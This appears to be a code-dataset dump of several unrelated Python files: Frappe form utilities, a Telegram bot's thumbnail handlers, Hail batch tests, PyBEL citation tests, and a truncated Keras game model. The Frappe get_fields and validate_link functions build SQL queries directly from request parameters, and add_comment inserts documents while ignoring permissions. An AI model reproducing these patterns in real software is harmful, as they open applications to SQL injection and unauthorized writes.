hexsha
stringlengths
40
40
size
int64
4
1.02M
ext
stringclasses
8 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
209
max_stars_repo_name
stringlengths
5
121
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
209
max_issues_repo_name
stringlengths
5
121
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
209
max_forks_repo_name
stringlengths
5
121
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
4
1.02M
avg_line_length
float64
1.07
66.1k
max_line_length
int64
4
266k
alphanum_fraction
float64
0.01
1
39e5c2dae3dc34b172fb5b29d42d8de5ab19cf39
4,372
py
Python
frappe/desk/form/utils.py
Steggur/frappe
be95a19704dd3ac667f7ad64e1694dc5d59856fe
[ "MIT" ]
null
null
null
frappe/desk/form/utils.py
Steggur/frappe
be95a19704dd3ac667f7ad64e1694dc5d59856fe
[ "MIT" ]
null
null
null
frappe/desk/form/utils.py
Steggur/frappe
be95a19704dd3ac667f7ad64e1694dc5d59856fe
[ "MIT" ]
1
2018-03-22T00:24:53.000Z
2018-03-22T00:24:53.000Z
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals import frappe, json import frappe.desk.form.meta import frappe.desk.form.load from frappe import _ @frappe.whitelist() def remove_attach(): """remove attachment""" import frappe.utils.file_manager fid = frappe.form_dict.get('fid') return frappe.utils.file_manager.remove_file(fid) @frappe.whitelist() def get_fields(): """get fields""" r = {} args = { 'select':frappe.form_dict.get('select') ,'from':frappe.form_dict.get('from') ,'where':frappe.form_dict.get('where') } ret = frappe.db.sql("select %(select)s from `%(from)s` where %(where)s limit 1" % args) if ret: fl, i = frappe.form_dict.get('fields').split(','), 0 for f in fl: r[f], i = ret[0][i], i+1 frappe.response['message']=r @frappe.whitelist() def validate_link(): """validate link when updated by user""" import frappe import frappe.utils value, options, fetch = frappe.form_dict.get('value'), frappe.form_dict.get('options'), frappe.form_dict.get('fetch') # no options, don't validate if not options or options=='null' or options=='undefined': frappe.response['message'] = 'Ok' return if frappe.db.sql("select name from `tab%s` where name=%s" % (options, '%s'), (value,)): # get fetch values if fetch: # escape with "`" fetch = ", ".join(("`{0}`".format(f.strip()) for f in fetch.split(","))) frappe.response['fetch_values'] = [frappe.utils.parse_val(c) \ for c in frappe.db.sql("select %s from `tab%s` where name=%s" \ % (fetch, options, '%s'), (value,))[0]] frappe.response['message'] = 'Ok' @frappe.whitelist() def add_comment(doc): """allow any logged user to post a comment""" doc = frappe.get_doc(json.loads(doc)) doc.insert(ignore_permissions = True) return doc.as_dict() @frappe.whitelist() def get_next(doctype, value, prev, filters=None, order_by="modified desc"): import frappe.desk.reportview prev = not int(prev) sort_field, sort_order = order_by.split(" ") if not filters: filters = [] if isinstance(filters, basestring): filters = json.loads(filters) # condition based on sort order condition = ">" if sort_order.lower()=="desc" else "<" # switch the condition if prev: condition = "<" if condition==">" else "<" else: sort_order = "asc" if sort_order.lower()=="desc" else "desc" # add condition for next or prev item if not order_by[0] in [f[1] for f in filters]: filters.append([doctype, sort_field, condition, value]) res = frappe.desk.reportview.execute(doctype, fields = ["name"], filters = filters, order_by = sort_field + " " + sort_order, limit_start=0, limit_page_length=1, as_list=True) if not res: frappe.msgprint(_("No further records")) return None else: return res[0][0] @frappe.whitelist() def get_linked_docs(doctype, name, metadata_loaded=None, no_metadata=False): if not metadata_loaded: metadata_loaded = [] meta = frappe.desk.form.meta.get_meta(doctype) linkinfo = meta.get("__linked_with") results = {} if not linkinfo: return results me = frappe.db.get_value(doctype, name, ["parenttype", "parent"], as_dict=True) for dt, link in linkinfo.items(): link["doctype"] = dt link_meta_bundle = frappe.desk.form.load.get_meta_bundle(dt) linkmeta = link_meta_bundle[0] if not linkmeta.get("issingle"): fields = [d.fieldname for d in linkmeta.get("fields", {"in_list_view":1, "fieldtype": ["not in", ["Image", "HTML", "Button", "Table"]]})] \ + ["name", "modified", "docstatus"] fields = ["`tab{dt}`.`{fn}`".format(dt=dt, fn=sf.strip()) for sf in fields if sf] try: if link.get("get_parent"): if me and me.parent and me.parenttype == dt: ret = frappe.get_list(doctype=dt, fields=fields, filters=[[dt, "name", '=', me.parent]]) else: ret = None elif link.get("child_doctype"): ret = frappe.get_list(doctype=dt, fields=fields, filters=[[link.get('child_doctype'), link.get("fieldname"), '=', name]]) else: ret = frappe.get_list(doctype=dt, fields=fields, filters=[[dt, link.get("fieldname"), '=', name]]) except frappe.PermissionError: continue if ret: results[dt] = ret if not no_metadata and not dt in metadata_loaded: frappe.local.response.docs.extend(link_meta_bundle) return results
28.763158
118
0.674062
f256a2a472b2e70ee1c5a55c003a82b8688f94e0
3,601
py
Python
renamer/plugins/thumbnail.py
Anonymous257/TG-RENAMER-BOT
453eac0fb95e26d5d620a51c5bcb732b88420cd3
[ "Apache-2.0" ]
null
null
null
renamer/plugins/thumbnail.py
Anonymous257/TG-RENAMER-BOT
453eac0fb95e26d5d620a51c5bcb732b88420cd3
[ "Apache-2.0" ]
null
null
null
renamer/plugins/thumbnail.py
Anonymous257/TG-RENAMER-BOT
453eac0fb95e26d5d620a51c5bcb732b88420cd3
[ "Apache-2.0" ]
null
null
null
import logging logger = logging.getLogger(__name__) import os from ..config import Config from ..tools.text import TEXT from ..database.database import * from pyrogram import Client as Filerenamer_X1, filters from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup ################## Saving thumbnail 🖼 ################## @Filerenamer_X1.on_message(filters.photo & filters.incoming & filters.private) async def save_photo(c, m): if Config.BANNED_USERS: if m.from_user.id in Config.BANNED_USERS: return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True) if Config.BOT_PASSWORD: is_logged = (await get_data(m.from_user.id)).is_logged if not is_logged and not Config.AUTH_USERS: return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True) download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg" await update_thumb(m.from_user.id, m.message_id) await m.download(file_name=download_location) await m.reply_text( text=TEXT.SAVED_CUSTOM_THUMBNAIL, quote=True ) ################## Deleting permanent thumbnail 🗑 ################## @Filerenamer_X1.on_message(filters.command("deletethumbnail") & filters.incoming & filters.private) async def delete_thumbnail(c, m): if Config.BANNED_USERS: if m.from_user.id in Config.BANNED_USERS: return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True) if Config.BOT_PASSWORD: is_logged = (await get_data(m.from_user.id)).is_logged if not is_logged and not Config.AUTH_USERS: return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True) download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg" thumbnail = (await get_data(m.from_user.id)).thumb_id if not thumbnail: text = TEXT.NO_CUSTOM_THUMB_NAIL_FOUND else: await update_thumb(m.from_user.id, None) text = TEXT.DELETED_CUSTOM_THUMBNAIL try: os.remove(download_location) except: pass await m.reply_text( text=text, quote=True ) ################## Sending permanent thumbnail 🕶 ################## @Filerenamer_X1.on_message(filters.command("showthumbnail") & filters.incoming & filters.private) async def show_thumbnail(c, m): if Config.BANNED_USERS: if m.from_user.id in Config.BANNED_USERS: return await m.reply_text(TEXT.BANNED_USER_TEXT, quote=True) if Config.BOT_PASSWORD: is_logged = (await get_data(m.from_user.id)).is_logged if not is_logged and not Config.AUTH_USERS: return await m.reply_text(TEXT.NOT_LOGGED_TEXT, quote=True) thumbnail = (await get_data(m.from_user.id)).thumb_id if not thumbnail: await m.reply_text( text=TEXT.NO_CUSTOM_THUMB_NAIL_FOUND, quote=True ) else: download_location = f"{Config.DOWNLOAD_LOCATION}/{m.from_user.id}.jpg" if not os.path.exists(download_location): thumb_nail = await c.get_messages(m.chat.id, thumbnail) try: download_location = await thumb_nail.download(file_name=download_location) except: await update_thumb(m.from_user.id, None) return await m.reply_text(text=TEXT.NO_CUSTOM_THUMB_NAIL_FOUND, quote=True) await m.reply_photo( photo=download_location, caption=TEXT.THUMBNAIL_CAPTION, parse_mode="markdown", quote=True ) ################## THE END 🛑 ##################
33.342593
99
0.655374
dcd173f9482187dbe13f05d7223011754615ca50
9,268
py
Python
batch/test/test_dag.py
sigmarkarl/hail
11b7c22342a945c61b24c5f8babf4ab411d3d2f1
[ "MIT" ]
null
null
null
batch/test/test_dag.py
sigmarkarl/hail
11b7c22342a945c61b24c5f8babf4ab411d3d2f1
[ "MIT" ]
2
2016-11-17T03:06:10.000Z
2017-12-05T19:00:24.000Z
batch/test/test_dag.py
sigmarkarl/hail
11b7c22342a945c61b24c5f8babf4ab411d3d2f1
[ "MIT" ]
2
2020-07-28T18:55:19.000Z
2020-10-19T16:43:03.000Z
import time import re import pytest from flask import Response from hailtop.config import get_user_config from hailtop.batch_client.client import BatchClient, Job import hailtop.batch_client.aioclient as aioclient from .utils import batch_status_job_counter, \ legacy_batch_status from .serverthread import ServerThread @pytest.fixture def client(): client = BatchClient('test') yield client client.close() def test_simple(client): batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['echo', 'head']) tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head]) batch = batch.submit() batch.wait() status = legacy_batch_status(batch) assert batch_status_job_counter(status, 'Success') == 2, status assert all([j['exit_code'] == 0 for j in status['jobs']]) def test_missing_parent_is_400(client): try: batch = client.create_batch() fake_job = aioclient.Job.unsubmitted_job(batch._async_builder, 10000) fake_job = Job.from_async_job(fake_job) batch.create_job('ubuntu:18.04', command=['echo', 'head'], parents=[fake_job]) batch.submit() except ValueError as err: assert re.search('parents with invalid job ids', str(err)) return assert False def test_dag(client): batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['echo', 'head']) left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head]) right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head]) tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right]) batch = batch.submit() batch.wait() status = legacy_batch_status(batch) assert batch_status_job_counter(status, 'Success') == 4, status for node in [head, left, right, tail]: status = node.status() assert status['state'] == 'Success' assert node._get_exit_code(status, 'main') == 0 def test_cancel_tail(client): batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['echo', 'head']) left = batch.create_job('ubuntu:18.04', command=['echo', 'left'], parents=[head]) right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head]) tail = batch.create_job( 'ubuntu:18.04', command=['/bin/sh', '-c', 'while true; do sleep 86000; done'], parents=[left, right]) batch = batch.submit() left.wait() right.wait() batch.cancel() batch.wait() status = legacy_batch_status(batch) assert batch_status_job_counter(status, 'Success') == 3, status for node in [head, left, right]: status = node.status() assert status['state'] == 'Success' assert node._get_exit_code(status, 'main') == 0 assert tail.status()['state'] == 'Cancelled' def test_cancel_left_after_tail(client): batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['echo', 'head']) left = batch.create_job( 'ubuntu:18.04', command=['/bin/sh', '-c', 'while true; do sleep 86000; done'], parents=[head]) right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head]) tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right]) batch = batch.submit() head.wait() right.wait() batch.cancel() batch.wait() status = legacy_batch_status(batch) assert batch_status_job_counter(status, 'Success') == 2, status for node in [head, right]: status = node.status() assert status['state'] == 'Success' assert node._get_exit_code(status, 'main') == 0 for node in [left, tail]: assert node.status()['state'] == 'Cancelled' def test_callback(client): from flask import Flask, request app = Flask('test-client') callback_body = [] @app.route('/test', methods=['POST']) def test(): body = request.get_json() callback_body.append(body) return Response(status=200) try: server = ServerThread(app) server.start() b = client.create_batch( callback=server.url_for('/test'), attributes={'foo': 'bar'}) head = b.create_job('alpine:3.8', command=['echo', 'head']) tail = b.create_job('alpine:3.8', command=['echo', 'tail'], parents=[head]) b = b.submit() b.wait() i = 0 while not callback_body: time.sleep(0.100 * (3/2) ** i) i += 1 if i > 14: break callback_body = callback_body[0] # verify required fields present callback_body.pop('cost') callback_body.pop('msec_mcpu') callback_body.pop('time_created') callback_body.pop('time_closed') callback_body.pop('time_completed') callback_body.pop('duration') assert (callback_body == { 'id': b.id, 'billing_project': 'test', 'state': 'success', 'complete': True, 'closed': True, 'n_jobs': 2, 'n_completed': 2, 'n_succeeded': 2, 'n_failed': 0, 'n_cancelled': 0, 'attributes': {'foo': 'bar'} }), callback_body finally: if server: server.shutdown() server.join() def test_no_parents_allowed_in_other_batches(client): b1 = client.create_batch() b2 = client.create_batch() head = b1.create_job('ubuntu:18.04', command=['echo', 'head']) try: b2.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head]) except ValueError as err: assert re.search('parents from another batch', str(err)) return assert False def test_input_dependency(client): bucket_name = get_user_config().get('batch', 'bucket') batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'echo head1 > /io/data1 ; echo head2 > /io/data2'], output_files=[('/io/data*', f'gs://{bucket_name}')]) tail = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'cat /io/data1 ; cat /io/data2'], input_files=[(f'gs://{bucket_name}/data*', '/io/')], parents=[head]) batch.submit() tail.wait() assert head._get_exit_code(head.status(), 'main') == 0, head._status assert tail.log()['main'] == 'head1\nhead2\n', tail.status() def test_input_dependency_directory(client): bucket_name = get_user_config().get('batch', 'bucket') batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'mkdir -p /io/test/; echo head1 > /io/test/data1 ; echo head2 > /io/test/data2'], output_files=[('/io/test/', f'gs://{bucket_name}')]) tail = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'cat /io/test/data1; cat /io/test/data2'], input_files=[(f'gs://{bucket_name}/test', '/io/')], parents=[head]) batch.submit() tail.wait() assert head._get_exit_code(head.status(), 'main') == 0, head._status assert tail.log()['main'] == 'head1\nhead2\n', tail.status() def test_always_run_cancel(client): batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['echo', 'head']) left = batch.create_job( 'ubuntu:18.04', command=['/bin/sh', '-c', 'while true; do sleep 86000; done'], parents=[head]) right = batch.create_job('ubuntu:18.04', command=['echo', 'right'], parents=[head]) tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[left, right], always_run=True) batch = batch.submit() right.wait() batch.cancel() batch.wait() status = legacy_batch_status(batch) assert batch_status_job_counter(status, 'Success') == 3, status assert batch_status_job_counter(status, 'Cancelled') == 1, status for node in [head, right, tail]: status = node.status() assert status['state'] == 'Success', status assert node._get_exit_code(status, 'main') == 0, status def test_always_run_error(client): batch = client.create_batch() head = batch.create_job('ubuntu:18.04', command=['/bin/sh', '-c', 'exit 1']) tail = batch.create_job('ubuntu:18.04', command=['echo', 'tail'], parents=[head], always_run=True) batch = batch.submit() batch.wait() status = legacy_batch_status(batch) assert batch_status_job_counter(status, 'Failed') == 1 assert batch_status_job_counter(status, 'Success') == 1 for job, ec, state in [(head, 1, 'Failed'), (tail, 0, 'Success')]: status = job.status() assert status['state'] == state, status assert job._get_exit_code(status, 'main') == ec, status
36.924303
135
0.591282
6f8e3e23eb5b71660839226903cc28db078b4756
8,844
py
Python
tests/test_manager/test_citation_utils.py
cthoyt/pybel
ed66f013a77f9cbc513892b0dad1025b8f68bb46
[ "Apache-2.0" ]
null
null
null
tests/test_manager/test_citation_utils.py
cthoyt/pybel
ed66f013a77f9cbc513892b0dad1025b8f68bb46
[ "Apache-2.0" ]
11
2017-12-28T08:03:14.000Z
2019-01-15T02:13:58.000Z
tests/test_manager/test_citation_utils.py
cthoyt/pybel
ed66f013a77f9cbc513892b0dad1025b8f68bb46
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """Test the manager's citation utilities. The test data can be created with the following script: .. code-block:: python import json from pybel.manager.citation_utils import get_pubmed_citation_response DATA = {'29324713', '29359844', '9611787', '25818332', '26438529', '26649137', '27003210'} rv = get_pubmed_citation_response(DATA) with open('/Users/cthoyt/dev/bel/pybel/tests/test_manager/citation_data.json', 'w') as file: json.dump(rv, file, indent=2) """ import json import os import time import unittest from typing import Any, Iterable, Mapping from unittest import mock from pybel import BELGraph from pybel.constants import ( CITATION, CITATION_AUTHORS, CITATION_DATE, CITATION_JOURNAL, CITATION_TYPE_PUBMED, ) from pybel.dsl import Protein from pybel.language import CitationDict from pybel.manager.citation_utils import ( _enrich_citations, enrich_pubmed_citations, get_citations_by_pmids, sanitize_date, ) from pybel.manager.models import Citation from pybel.testing.cases import TemporaryCacheMixin from pybel.testing.utils import n HERE = os.path.abspath(os.path.dirname(__file__)) PUBMED_DATA_PATH = os.path.join(HERE, "pubmed_citation_data.json") with open(PUBMED_DATA_PATH) as _file: PUBMED_DATA = json.load(_file) PMC_DATA_PATH = os.path.join(HERE, "pmc_citation_data.json") with open(PMC_DATA_PATH) as _file: PMC_DATA = json.load(_file) def _mock_fn(pubmed_identifiers: Iterable[str]) -> Mapping[str, Any]: result = { "uids": pubmed_identifiers, } for pmid in pubmed_identifiers: result[pmid] = PUBMED_DATA["result"][pmid] return {"result": result} mock_get_pubmed_citation_response = mock.patch( "pybel.manager.citation_utils.get_pubmed_citation_response", side_effect=_mock_fn, ) def _mock_get_pmc_csl_item(pmc_id: str) -> Mapping[str, Any]: return PMC_DATA[pmc_id] mock_get_pmc_csl_item = mock.patch( "pybel.manager.citation_utils.get_pmc_csl_item", side_effect=_mock_get_pmc_csl_item, ) class TestSanitizeDate(unittest.TestCase): """Test sanitization of dates in various formats.""" def test_sanitize_1(self): """Test YYYY Mon DD.""" self.assertEqual("2012-12-19", sanitize_date("2012 Dec 19")) def test_sanitize_2(self): """Test YYYY Mon.""" self.assertEqual("2012-12-01", sanitize_date("2012 Dec")) def test_sanitize_3(self): """Test YYYY.""" self.assertEqual("2012-01-01", sanitize_date("2012")) def test_sanitize_4(self): """Test YYYY Mon-Mon.""" self.assertEqual("2012-10-01", sanitize_date("2012 Oct-Dec")) def test_sanitize_5(self): """Test YYYY Season.""" self.assertEqual("2012-03-01", sanitize_date("2012 Spring")) def test_sanitize_6(self): """Test YYYY Mon DD-DD.""" self.assertEqual("2012-12-12", sanitize_date("2012 Dec 12-15")) def test_sanitize_7(self): """Test YYYY Mon DD-Mon DD.""" self.assertEqual("2005-01-29", sanitize_date("2005 Jan 29-Feb 4")) def test_sanitize_nope(self): """Test failure.""" self.assertEqual(None, sanitize_date("2012 Early Spring")) class TestPubmed(TemporaryCacheMixin): """Tests for citations.""" def setUp(self): super().setUp() self.u, self.v = (Protein(n(), n()) for _ in range(2)) self.pmid = "9611787" self.graph = BELGraph() self.graph.add_increases(self.u, self.v, citation=self.pmid, evidence=n()) @mock_get_pubmed_citation_response def test_enrich_pubmed(self, *_): self.assertEqual(0, self.manager.count_citations()) get_citations_by_pmids(manager=self.manager, pmids=[self.pmid]) self.assertEqual(1, self.manager.count_citations()) c = self.manager.get_citation_by_pmid(self.pmid) self.assertIsNotNone(c) self.assertIsInstance(c, Citation) self.assertEqual(CITATION_TYPE_PUBMED, c.db) self.assertEqual(self.pmid, c.db_id) @mock_get_pubmed_citation_response def test_enrich_pubmed_list(self, *_): pmids = [ "25818332", "27003210", "26438529", "26649137", ] get_citations_by_pmids(manager=self.manager, pmids=pmids) citation = self.manager.get_or_create_citation(namespace=CITATION_TYPE_PUBMED, identifier="25818332") self.assertIsNotNone(citation) @mock_get_pubmed_citation_response def test_enrich_pubmed_list_grouped(self, *_): pmids = [ "25818332", "27003210", "26438529", "26649137", ] get_citations_by_pmids(manager=self.manager, pmids=pmids, group_size=2) citation = self.manager.get_citation_by_pmid("25818332") self.assertIsNotNone(citation) @mock_get_pubmed_citation_response def test_enrich_pubmed_overwrite(self, *_): citation = self.manager.get_or_create_citation(namespace=CITATION_TYPE_PUBMED, identifier=self.pmid) self.manager.session.commit() self.assertIsNone(citation.date) self.assertIsNone(citation.title) enrich_pubmed_citations(manager=self.manager, graph=self.graph) _, _, d = list(self.graph.edges(data=True))[0] citation_dict = d[CITATION] self.assertIsInstance(citation_dict, CitationDict) self.assertIn(CITATION_JOURNAL, citation_dict) self.assertIn(CITATION_DATE, citation_dict) self.assertEqual("1998-05-01", citation_dict[CITATION_DATE]) self.assertIn(CITATION_AUTHORS, citation_dict) self.assertEqual( {"Lewell XQ", "Judd DB", "Watson SP", "Hann MM"}, set(citation_dict[CITATION_AUTHORS]), ) @mock_get_pubmed_citation_response def test_enrich_pubmed_graph(self, *_): enrich_pubmed_citations(manager=self.manager, graph=self.graph) _, _, d = list(self.graph.edges(data=True))[0] citation_dict = d[CITATION] self.assertIsInstance(citation_dict, CitationDict) self.assertIn(CITATION_JOURNAL, citation_dict) self.assertIn(CITATION_DATE, citation_dict) self.assertEqual("1998-05-01", citation_dict[CITATION_DATE]) self.assertIn(CITATION_AUTHORS, citation_dict) self.assertEqual( {"Lewell XQ", "Judd DB", "Watson SP", "Hann MM"}, set(citation_dict[CITATION_AUTHORS]), ) @mock_get_pubmed_citation_response @unittest.skipIf(os.environ.get("DB") == "mysql", reason="MySQL collation is wonky") def test_enrich_pubmed_accent_duplicate(self, *_): """Test when two authors, Gomez C and Goméz C are both checked that they are not counted as duplicates.""" g1 = "Gomez C" g2 = "Gómez C" pmid_1, pmid_2 = pmids = [ "29324713", "29359844", ] get_citations_by_pmids(manager=self.manager, pmids=pmids) time.sleep(1) x = self.manager.get_citation_by_pmid(pmid_1) self.assertIsNotNone(x) self.assertEqual("Martínez-Guillén JR", x.first.name, msg="wrong first author name") self.assertIn(g1, self.manager.object_cache_author) self.assertIn(g2, self.manager.object_cache_author) a1 = self.manager.get_author_by_name(g1) self.assertEqual(g1, a1.name) a2 = self.manager.get_author_by_name(g2) self.assertEqual(g2, a2.name) class TestPMC(TemporaryCacheMixin): """Tests for citations.""" def setUp(self): super().setUp() self.u, self.v = (Protein(n(), n()) for _ in range(2)) self.citation_identifier = "PMC6611653" self.graph = BELGraph() self.graph.add_increases(self.u, self.v, citation=("pmc", self.citation_identifier), evidence=n()) @mock_get_pmc_csl_item def test_enrich_pmc(self, *_): errors = _enrich_citations(manager=self.manager, graph=self.graph, prefix="pmc") self.assertEqual(0, len(errors), msg=f"Got errors: {errors}") _, _, d = list(self.graph.edges(data=True))[0] citation_dict = d[CITATION] self.assertIsInstance(citation_dict, CitationDict) self.assertEqual("pmc", citation_dict.namespace) self.assertEqual(self.citation_identifier, citation_dict.identifier) self.assertIn(CITATION_JOURNAL, citation_dict) self.assertEqual("PLoS computational biology", citation_dict[CITATION_JOURNAL]) self.assertIn(CITATION_DATE, citation_dict) self.assertEqual("2019-06-24", citation_dict[CITATION_DATE]) self.assertIn(CITATION_AUTHORS, citation_dict) self.assertLess(0, len(citation_dict[CITATION_AUTHORS])) # TODO the eUtils and CSL thing both normalize the way autors look
33
114
0.676278
d50ba0b3f5281f1614b3009b6707bea85f17e078
592
py
Python
sits.py
Peter1-cyber/sits
218bc3b08adee33af438fc9300d73167a1f0cbeb
[ "CC0-1.0" ]
null
null
null
sits.py
Peter1-cyber/sits
218bc3b08adee33af438fc9300d73167a1f0cbeb
[ "CC0-1.0" ]
null
null
null
sits.py
Peter1-cyber/sits
218bc3b08adee33af438fc9300d73167a1f0cbeb
[ "CC0-1.0" ]
null
null
null
# Модуль для вычисления количества приседаний # Здесь должен быть твой код from scrollLabel import * class Sits(ScrollLabel): def __init__(self, total, **kwargs): self.total = total self.current = 0 text = 'Осталось приседаний: ' + str(self.total) super().__init__(text, **kwargs) def next(self, *args): self.current +=1 self.remain = max(0, self.total - self.current) self.text = 'Осталось приседаний: ' + str(self.remain) super().set_text(self.text)
14.095238
63
0.560811
b80a59e936eb4c99d8035f8de23550d979a1fc23
1,296
py
Python
bw2analyzer/explorer.py
aleksandra-kim/brightway2-analyzer-copy
c85961bd2b644458fbeef92e5471ec76d520ab38
[ "BSD-3-Clause" ]
null
null
null
bw2analyzer/explorer.py
aleksandra-kim/brightway2-analyzer-copy
c85961bd2b644458fbeef92e5471ec76d520ab38
[ "BSD-3-Clause" ]
null
null
null
bw2analyzer/explorer.py
aleksandra-kim/brightway2-analyzer-copy
c85961bd2b644458fbeef92e5471ec76d520ab38
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import print_function, unicode_literals from eight import * from bw2data import Database, databases class DatabaseExplorer(object): def __init__(self, name): self.db = Database(name) self.data = self.db.load() for db in databases[name]["depends"]: self.data.update(Database(db).load()) def uses_this_process(self, key, recursion=0): if recursion: return dict( [ (k, self.uses_this_process(k, recursion - 1)) for k in self.data if key in [e["input"] for e in self.data[k].get("exchanges", [])] ] ) else: return [ k for k in self.data if key in [e["input"] for e in self.data[k].get("exchanges", [])] ] def provides_this_process(self, key, recursion=0): if recursion: return dict( [ (e["input"], self.provides_this_process(e["input"], recursion - 1)) for e in self.data[key].get("exchanges", []) ] ) else: return [(e["input"], ()) for e in self.data[key].get("exchanges", [])]
31.609756
87
0.493056
ceb25b59075fc25d5f7f629dd0c227f75693ba99
2,661
py
Python
easybimehlanding/models/insurance_companies.py
kmelodi/EasyBimehLanding_Python
b574a76a8805b306a423229b572c36dae0159def
[ "MIT" ]
null
null
null
easybimehlanding/models/insurance_companies.py
kmelodi/EasyBimehLanding_Python
b574a76a8805b306a423229b572c36dae0159def
[ "MIT" ]
null
null
null
easybimehlanding/models/insurance_companies.py
kmelodi/EasyBimehLanding_Python
b574a76a8805b306a423229b572c36dae0159def
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ easybimehlanding This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ). """ import easybimehlanding.models.combo_data_model class InsuranceCompanies(object): """Implementation of the 'InsuranceCompanies' model. TODO: type model description here. Attributes: is_success (bool): TODO: type description here. status (int): TODO: type description here. message (list of ComboDataModel): TODO: type description here. extra_data (string): TODO: type description here. exception (string): TODO: type description here. """ # Create a mapping from Model property names to API property names _names = { "is_success":'isSuccess', "status":'status', "message":'message', "extra_data":'extraData', "exception":'exception' } def __init__(self, is_success=None, status=None, message=None, extra_data=None, exception=None): """Constructor for the InsuranceCompanies class""" # Initialize members of the class self.is_success = is_success self.status = status self.message = message self.extra_data = extra_data self.exception = exception @classmethod def from_dictionary(cls, dictionary): """Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class. """ if dictionary is None: return None # Extract variables from the dictionary is_success = dictionary.get('isSuccess') status = dictionary.get('status') message = None if dictionary.get('message') != None: message = list() for structure in dictionary.get('message'): message.append(easybimehlanding.models.combo_data_model.ComboDataModel.from_dictionary(structure)) extra_data = dictionary.get('extraData') exception = dictionary.get('exception') # Return an object of this model return cls(is_success, status, message, extra_data, exception)
30.586207
115
0.579481
ce2275e75339c595de7561a4a0163e3aac451139
8,516
py
Python
src/backend/game/models.py
ToJestKrzysio/TheJungleGame
904dd4adc937145df2c8c353eb83bec3b5dd1f7e
[ "MIT" ]
null
null
null
src/backend/game/models.py
ToJestKrzysio/TheJungleGame
904dd4adc937145df2c8c353eb83bec3b5dd1f7e
[ "MIT" ]
null
null
null
src/backend/game/models.py
ToJestKrzysio/TheJungleGame
904dd4adc937145df2c8c353eb83bec3b5dd1f7e
[ "MIT" ]
null
null
null
import logging import os from abc import ABC, abstractmethod from typing import Tuple, TYPE_CHECKING import numpy as np from tensorflow.keras import regularizers, optimizers, layers, Model from tensorflow.keras.models import load_model if TYPE_CHECKING: from game import BoardTensor class AbstractModel(ABC): model: Model name: str def __init__(self, **kwargs): self.name = "" @abstractmethod def predict(self, tensor: "BoardTensor", mask: np.array) -> Tuple[float, np.ndarray]: pass @abstractmethod def set_name(self, name: str) -> None: pass @abstractmethod def load(self, filename: str) -> None: pass @abstractmethod def load_checkpoint(self, filepath: str) -> None: pass @abstractmethod def save(self, filename: str) -> None: pass class ValuePolicyModel(AbstractModel): def __init__(self, **kwargs): super().__init__() self.conv_kernel_reg = regularizers.l2( kwargs.get("CONVOLUTIONAL_KERNEL_REGULARIZATION", 0.01)) self.conv_bias_reg = regularizers.l2( kwargs.get("CONVOLUTIONAL_BIAS_REGULARIZATION", 0.01)) self.dense_kernel_reg = regularizers.l2( kwargs.get("DENSE_KERNEL_REGULARIZATION", 0.01)) self.dense_bias_reg = regularizers.l2( kwargs.get("DENSE_BIAS_REGULARIZATION", 0.01)) self.num_filters = kwargs.get("NUMBER_OF_FILTERS", 12) self.policy_loss_weight = kwargs.get("POLICY_LOSS_WEIGHT", 0.01) self.value_loss_weight = kwargs.get("VALUE_LOSS_WEIGHT", 0.01) self.input_shape = (9, 7, 24) self.output_shape = (9, 7, 8) self.conv_blocks = kwargs.get("CONVOLUTIONAL_BLOCKS", 6) self.model = self._create_model() self.base_dir = kwargs.get("BASE_DIR", "data/models") # TODO unify save paths self._cache = {} def _create_model(self) -> Model: model_input = layers.Input(shape=self.input_shape) input_layer = model_input for layer_id in range(self.conv_blocks): input_layer = self._get_conv_block(input_layer, layer_id) final_conv_layer = input_layer policy_head = self._get_policy_head(final_conv_layer) value_head = self._get_value_head(final_conv_layer) model = Model(model_input, 